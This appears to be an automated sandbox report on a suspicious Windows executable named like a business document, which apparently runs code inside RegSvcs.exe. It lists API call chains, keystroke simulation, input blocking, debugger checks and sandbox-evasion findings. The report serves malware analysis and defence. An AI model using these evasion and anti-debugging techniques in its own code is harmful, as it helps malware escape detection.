Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9AA42 push cs; ret	0_2_00C9AA48
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9AA62 push cs; ret	0_2_00C9AA6C
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9AA73 push cs; ret	0_2_00C9AA74
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9AA3F push cs; ret	0_2_00C9AA40
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C9AA36 push cs; ret	0_2_00C9AA3C
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C46B05 push ecx; ret	0_2_00C46B18
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6B2B1 push FFFFFF8Bh; iretd	0_2_00C6B2B3
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C3F25C push 8C00C3F2h; ret	0_2_00C3F261
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4BDAA push edi; ret	0_2_00C4BDAC
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C4BEC3 push esi; ret	0_2_00C4BEC5

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C88111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00C88111
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C3EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00C3EB42

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C4123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00C4123A

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

API/Special instruction interceptor: Address: 18CCF34

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598215	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597398	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597286	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596795	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594390	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1722			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8143			Jump to behavior

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Evaded block: after key decision

graph_0-93779

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-94499

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

API coverage: 4.7 %

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C66CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C66CA9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00C660DD
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00C663F9
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C6EB60
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C6F5FA
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C6F56F FindFirstFileW,FindClose,	0_2_00C6F56F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C71B2F
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C71C8A
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_00C71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C71F94

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C3DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00C3DDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599640	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599202	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599093	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598765	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598215	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597999	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597398	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597286	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597122	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596795	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595702	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594390	Jump to behavior

Source: RegSvcs.exe, 00000001.00000002.4129834796.0000000001295000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	API call chain: ExitProcess graph end node			graph_0-94072
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	API call chain: ExitProcess graph end node			graph_0-92819

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C76AAF BlockInput,

0_2_00C76AAF

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C23D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00C23D19

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C53920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00C53920

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C3E01E LoadLibraryA,GetProcAddress,

0_2_00C3E01E

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_018CD1A0 mov eax, dword ptr fs:[00000030h]	0_2_018CD1A0
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_018CD200 mov eax, dword ptr fs:[00000030h]	0_2_018CD200
Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe	Code function: 0_2_018CBB80 mov eax, dword ptr fs:[00000030h]	0_2_018CBB80

Source: C:\Users\user\Desktop\114117914 - Rebound Electronics.exe

Code function: 0_2_00C5A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00C5A66C

